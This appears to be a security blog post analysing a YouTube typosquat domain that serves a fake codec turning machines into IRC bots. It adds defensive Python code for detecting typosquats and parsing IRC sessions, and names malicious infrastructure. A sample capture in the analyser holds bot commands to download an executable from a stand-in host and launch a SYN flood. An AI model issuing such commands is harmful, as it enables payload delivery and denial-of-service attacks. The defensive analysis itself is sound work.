YouTube typo delivers IRC Bot
UPDATE:
The file is packed with a commercial protector (Armadillo), which makes unpacking it very difficult.
Once executed, it protects itself in memory by running as two processes: Armadillo's debug-blocker launches the protected program as a child process and attaches to it as its debugger, so an analyst's debugger cannot attach.
——–
Fresh from our honeypot, we discovered a malware site that relies on a typo in its domain name.
The site youtorube.com serves what appears to be a YouTube page (in Italian) and pushes a fake video codec.
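A domain like youtorube.com is two keystrokes away from youtube.com (two inserted characters), so a single-typo check would miss it. The following is an added example, not code from the original post: an edit-distance check (Levenshtein plus adjacent transposition) run over candidate hostnames against a small brand watch list. The watch list, the distance threshold of 2, and the assumption that the public suffix is a single label (".com") are mine.

```python
"""Flag hostnames whose labels sit within a small edit distance of a brand.

Added example; BRANDS, the threshold and the one-label public suffix
assumption are choices made for this illustration, not values from the post.
"""


def osa_distance(a, b):
    """Optimal string alignment distance: Levenshtein edits plus swapping two
    adjacent characters, each counted as one operation."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution or match
            )
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


BRANDS = {"youtube", "google", "paypal"}  # assumed watch list


def typosquat_matches(domain, brands=BRANDS, max_distance=2):
    """Return (label, brand, distance) for every non-TLD label of `domain`
    that is within `max_distance` edits of a watched brand but is not the
    brand itself. Assumes a one-label public suffix; real code would consult
    the public suffix list before deciding which label is registrable."""
    host = domain.lower().rstrip(".")
    labels = host.split(".")[:-1]  # drop the TLD
    hits = []
    for label in labels:
        if label in brands:
            continue  # the genuine brand label, e.g. youtube.com
        for brand in sorted(brands):
            dist = osa_distance(label, brand)
            if dist <= max_distance:
                hits.append((label, brand, dist))
    return hits


if __name__ == "__main__":
    for host in ("youtorube.com", "yuotube.com", "youtube.com", "example.com"):
        print(host, typosquat_matches(host))
```

Run against a DNS log or newly registered domain feed, this flags youtorube.com as two edits from youtube and leaves youtube.com and unrelated names alone; the threshold needs tuning for short brand names, where two edits cover too many legitimate words.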
The domain is registered to:
Pretty soon after running the fake codec, I observed IRC traffic with the same IP address:
This lets me know that I am part of an IRC channel:
The IRC server’s IP (87.98.184.231) has some interesting connections, including a “p0nwed.de” domain. Hmm…
I attempted to connect to that IRC channel manually, however the channel requires a key… In other words, I am not welcome.
Further analysis of the malware binary may reveal the channel's key, which is presumably hard-coded in it.
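The IRC session is the one part of this infection a defender can read without unpacking anything: the bot's own JOIN carries the channel key in cleartext (IRC is plaintext unless wrapped in TLS), and a manual JOIN without the key gets back numeric reply 475, ERR_BADCHANNELKEY. The following is an added example, not code or data from the original post: a minimal RFC 1459 line parser and a session analyser run over two constructed captures. The capture format (">" for host-to-server, "<" for server-to-host), the nick, channel name, key, operator hostmask and server name are all made up for the illustration.

```python
"""Spot IRC bot behaviour in a captured session.

Added example, not code or data from the post. The capture format is my own:
lines starting with "> " went from the infected host to the server, lines
starting with "< " came back. Nick, channel, key, operator hostmask and the
server name below are constructed stand-ins, not values from the real sample.
"""
import re
from dataclasses import dataclass
from typing import Optional

# RFC 1459 message grammar: [":" prefix " "] command {" " middle} [" :" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?"          # optional prefix: server or nick!user@host
    r"(?P<command>[A-Za-z]+|\d{3})"     # command word or three-digit numeric reply
    r"(?P<params>(?: [^: ][^ ]*)*)"     # middle params; none may start with ':'
    r"(?: :(?P<trailing>.*))?$"         # trailing param, may contain spaces
)

# Numeric replies a server sends when a JOIN is refused (RFC 1459 section 6.1)
JOIN_REFUSED = {
    "471": "ERR_CHANNELISFULL",
    "473": "ERR_INVITEONLYCHAN",
    "474": "ERR_BANNEDFROMCHAN",
    "475": "ERR_BADCHANNELKEY",
}


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: list
    trailing: Optional[str]


def parse_line(raw):
    """Parse one IRC protocol line; return None if it does not fit the grammar."""
    m = IRC_LINE.match(raw.rstrip("\r\n"))
    if not m:
        return None
    return IrcMessage(
        prefix=m.group("prefix"),
        command=m.group("command").upper(),
        params=m.group("params").split(),
        trailing=m.group("trailing"),
    )


def analyze_session(capture):
    """Walk a captured session and summarise what the client did and was told."""
    nick = None
    channel_keys = {}   # channel -> key the client sent with JOIN (None if no key)
    refused = []        # (channel, reason) for every rejected JOIN
    commands = []       # channel messages that look like bot commands (!cmd / .cmd)
    for line in capture:
        direction, _, raw = line.partition(" ")
        msg = parse_line(raw)
        if msg is None:
            continue
        if direction == ">":  # infected host -> server
            if msg.command == "NICK" and msg.params:
                nick = msg.params[0]
            elif msg.command == "JOIN" and msg.params:
                chans = msg.params[0].split(",")
                keys = msg.params[1].split(",") if len(msg.params) > 1 else []
                for i, chan in enumerate(chans):
                    channel_keys[chan] = keys[i] if i < len(keys) else None
        else:  # server -> infected host
            if msg.command in JOIN_REFUSED and len(msg.params) >= 2:
                refused.append((msg.params[1], JOIN_REFUSED[msg.command]))
            elif (msg.command == "PRIVMSG" and msg.params
                  and msg.params[0] in channel_keys
                  and msg.trailing and msg.trailing[:1] in "!."):
                commands.append(msg.trailing)
    # Heuristic: a client that joins a keyed channel and is then addressed with
    # bang-commands there is behaving like a bot, not a person.
    bot_like = any(k is not None for k in channel_keys.values()) and bool(commands)
    return {"nick": nick, "channel_keys": channel_keys, "refused": refused,
            "commands": commands, "bot_like": bot_like}


# Constructed capture of an infected host (values are stand-ins, see docstring)
INFECTED_HOST = [
    "> NICK [ITA]x9f3k2",
    "> USER x9f3k2 0 * :x9f3k2",
    "< :irc.example.invalid 001 [ITA]x9f3k2 :Welcome",
    "> JOIN #c2chan s3cr3tkey",
    "< :[ITA]x9f3k2!x9f3k2@198.51.100.7 JOIN :#c2chan",
    "< :op!op@example.invalid PRIVMSG #c2chan :!dl http://example.invalid/update.exe",
    "< :op!op@example.invalid PRIVMSG #c2chan :!syn 203.0.113.9 80 120",
]

# Constructed capture of an analyst joining by hand without the key
MANUAL_JOIN = [
    "> NICK analyst",
    "> USER analyst 0 * :analyst",
    "> JOIN #c2chan",
    "< :irc.example.invalid 475 analyst #c2chan :Cannot join channel (+k)",
]

if __name__ == "__main__":
    print(analyze_session(INFECTED_HOST))
    print(analyze_session(MANUAL_JOIN))
```

Fed the infected host's capture, the analyser recovers the nick, the channel and the key the bot sent, and lists the operator's commands; fed the manual attempt, it reports the 475 refusal and no bot-like behaviour. In practice the same parser can be pointed at a tcpflow or Wireshark "Follow TCP Stream" export of the bot's connection, which is usually a faster route to the key than unpacking a protected binary.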
The file itself is detected as:
Our Heuristic engine already detected it as:
At that point, however, I had aggregated enough data to determine that this 'codec' actually turns your machine into a bot, which is not a good thing.
Jerome Segura
Malware ID: f028c315649b7319e8ef2cc22dc67690.zip